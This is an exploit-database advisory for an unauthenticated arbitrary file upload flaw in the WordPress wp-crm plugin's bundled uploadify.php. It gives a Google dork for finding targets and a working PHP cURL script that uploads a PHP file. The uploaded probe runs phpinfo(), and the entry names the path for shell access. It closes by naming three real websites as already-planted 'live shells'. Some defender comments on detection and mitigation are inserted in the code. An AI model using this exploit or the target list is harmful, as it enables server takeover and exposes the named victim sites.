WordPress wp-crm Plugin Arbitrary File Upload Vulnerability



EKU-ID: 4115 CVE: OSVDB-ID:
Author: brunox Published: 2014-06-30 Verified: Verified


#############################################################################################
  
                                                                                            #
  
# Title : WordPress wp-crm Plugin Arbitrary File Upload Vulnerability                       #
  
                                                                                            #
  
# Author : X-Bruno                                                                          #
  
                                                                                            #
  
# Date : 27/06/2014                                                                         #
  
                                                                                            #
  
# Facebook : http://www.facebook.com/Inj3ct.Bruno                                           #
  
                                                                                            #
  
                                                                                            #
  
# Email: brunox338@gmail.com                                                                #
  
                                                                                            #
  
                                                                                            #
  
# Vendor : www.wordpress.org                                                                #
  
                                                                                            #
  
                                                                                            #
  
#Google Dork : inurl:/wp-content/plugins/wp-crm/                                            #
  
                                                                                            #
  
                                                                                            #
  
# Tested on : Linux                                                                         #
  
                                                                                            #
  
#############################################################################################
  
  
Exploit : upload shell/.php
  
  
  
<?php
// Proof-of-concept request against the Uploadify handler bundled with the wp-crm plugin.
// It is a plain multipart POST carrying a 'Filedata' file part and a caller-chosen
// 'folder' destination. No session cookie, WordPress nonce or other credential is sent,
// which suggests uploadify.php performs no authentication/capability check and no
// server-side extension allow-list before writing the file -- confirm against the plugin source.
//
// Defender notes:
//  - Detection: POST requests to */third-party/uploadify/uploadify.php in web server logs,
//    and new .php files appearing under wp-content/plugins/*/third-party/uploadify/.
//  - Because 'folder' is supplied by the client, the write location is not fixed to the
//    directory in the request URL; do not key monitoring on a single path. (The PoC as
//    written names a wp-property path here while the URL targets wp-crm.)
//  - Mitigation: remove the bundled uploadify.php, deny PHP execution in plugin
//    third-party/upload directories at the web server, and move to a vendor-fixed
//    release (no fixed version is given in this advisory).
$uploadfile="Bruno.php";
$ch = curl_init("http://localhost/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// '@file' is the legacy cURL file-upload form; the file is sent as the 'Filedata' part.
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The handler's response body is echoed back; it is the only success indicator the PoC checks.
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
  
  
-------------------------------
  
<?php
  
// Content of the uploaded probe file. phpinfo() discloses PHP configuration, loaded
// extensions and environment, and its output confirms the upload was executed as code.
// For responders: unexpected phpinfo() output served from a plugin directory is a
// compromise indicator; look for other files written alongside it and review access
// logs for the preceding POST to uploadify.php.
phpinfo();
  
?>
  
-------------------------------
  
Shell Access ==== > http://localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)
  
--------------------------------
  
Examples : (Live Shells) 
  
  
1- http://www.transport9.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
  
2- http://adbuzzler.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
  
3- http://ourladyofthecape.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
  
  
#####################################################################
  
  
# Greeting : Toomy Jone , Injector Hacker , Dr.SHA6H , HunTerS - Team #
  
  
#####################################################################